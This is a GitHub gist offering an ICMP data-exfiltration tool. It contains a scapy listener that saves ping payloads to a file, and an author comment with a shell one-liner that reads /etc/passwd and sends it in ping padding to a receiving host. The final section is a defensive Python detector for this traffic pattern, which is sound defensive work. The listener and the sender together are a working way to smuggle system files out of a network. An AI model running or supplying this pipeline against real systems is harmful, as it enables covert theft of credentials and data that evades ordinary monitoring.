@maxrodrigo
Created October 7, 2020 15:13
ICMP Exfiltration
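#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP, Raw


def process_packet(packet):
    # Only ICMP echo replies (type 0) that actually carry a payload are handled.
    if packet.haslayer(ICMP) and packet[ICMP].type == 0 and packet.haslayer(Raw):
        # The sender pads each ping with an 8-byte pattern; keep the last 8 bytes.
        data = packet[Raw].load[-8:]
        try:
            print(f"{data.decode('utf-8')}", end="")
        except UnicodeDecodeError:
            pass
        # Append the raw bytes so non-text data is preserved as well.
        with open("./exfil", "a+b") as f:
            f.write(data)


if __name__ == "__main__":
    sniff(iface="wlp3s0", prn=process_packet)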
@maxrodrigo
Author

ICMP Exfiltration Receiver

Sender:

xxd -p -c 8 /etc/passwd | while read h; do ping -c 1 -p $h 10.0.0.3; done

More in: https://0xffsec.com/handbook/exfiltration/#icmp
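
From the detection side, the sender above leaves a recognisable trace: each echo payload is padded with a short repeating pattern, and that pattern changes from packet to packet. The following is an added example, not part of the gist; it flags flows showing that behaviour and generalises to any `ping -p` pattern length. The 16-byte timestamp prefix, the threshold, the function names and the sample addresses other than 10.0.0.3 are assumptions.

```python
from collections import defaultdict

TIMESTAMP_LEN = 16    # assumption: 64-bit Linux ping prepends a 16-byte timeval
MAX_PATTERN_LEN = 16  # ping -p accepts at most 16 pad bytes


def fill_pattern(payload: bytes):
    """Return the repeating pad after the timestamp, or None if there is none."""
    body = payload[TIMESTAMP_LEN:]
    if len(body) < 2 * MAX_PATTERN_LEN:
        return None  # too short to judge periodicity reliably
    for period in range(1, MAX_PATTERN_LEN + 1):
        if all(body[i] == body[i % period] for i in range(len(body))):
            return body[:period]
    return None  # default ping data counts upward, so it never repeats


def suspicious_flows(packets, min_distinct=4):
    """packets: iterable of (src, dst, payload) taken from ICMP echo traffic.

    A fixed pad pattern is ordinary diagnostics; a pad that keeps changing
    within one flow means the payload itself is carrying data.
    """
    seen = defaultdict(set)
    for src, dst, payload in packets:
        pattern = fill_pattern(payload)
        if pattern is not None:
            seen[(src, dst)].add(pattern)
    return {flow: len(p) for flow, p in seen.items() if len(p) >= min_distinct}


def _payload(pad: bytes, size: int = 56) -> bytes:
    """Constructed sample: zeroed timestamp followed by the repeated pad."""
    return (b"\x00" * TIMESTAMP_LEN + pad * size)[:size]


# Constructed sample traffic: one flow with changing pads, one with default pings.
DEFAULT_PING = b"\x00" * TIMESTAMP_LEN + bytes(range(0x10, 0x38))
SAMPLE = [("10.0.0.7", "10.0.0.3", _payload(chunk))
          for chunk in (b"root:x:0", b":0:root:", b"/root:/b", b"in/bash\n")]
SAMPLE += [("10.0.0.9", "10.0.0.3", DEFAULT_PING)] * 5

if __name__ == "__main__":
    for flow, count in suspicious_flows(SAMPLE).items():
        print(f"{flow[0]} -> {flow[1]}: {count} distinct pad patterns")
```

In a live deployment the `(src, dst, payload)` tuples would come from a capture or sensor feed, and `min_distinct` should be tuned against normal monitoring traffic on the network.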
